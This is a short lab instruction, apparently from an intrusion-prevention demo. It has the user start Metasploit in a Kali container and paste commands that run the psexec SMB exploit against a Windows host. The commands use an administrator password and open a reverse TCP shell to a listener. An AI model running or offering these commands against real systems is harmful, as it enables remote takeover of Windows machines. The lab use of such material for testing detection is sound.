(Triggers 38321 -- currently disabled in Demo Instrusion Policy) On the Inside Linux Server: 1. Type "kali" to attach to the Kali Linux docker container. 2. Type "msfconsole" to start Metasploit. Then copy and paste the following commands: use exploit/windows/smb/psexec set RHOST 198.18.128.202 set PAYLOAD windows/shell/reverse_tcp set LHOST 172.17.0.3 set LPORT 4444 set SMBUSER administrator set SMPASS C1sco12345 exploit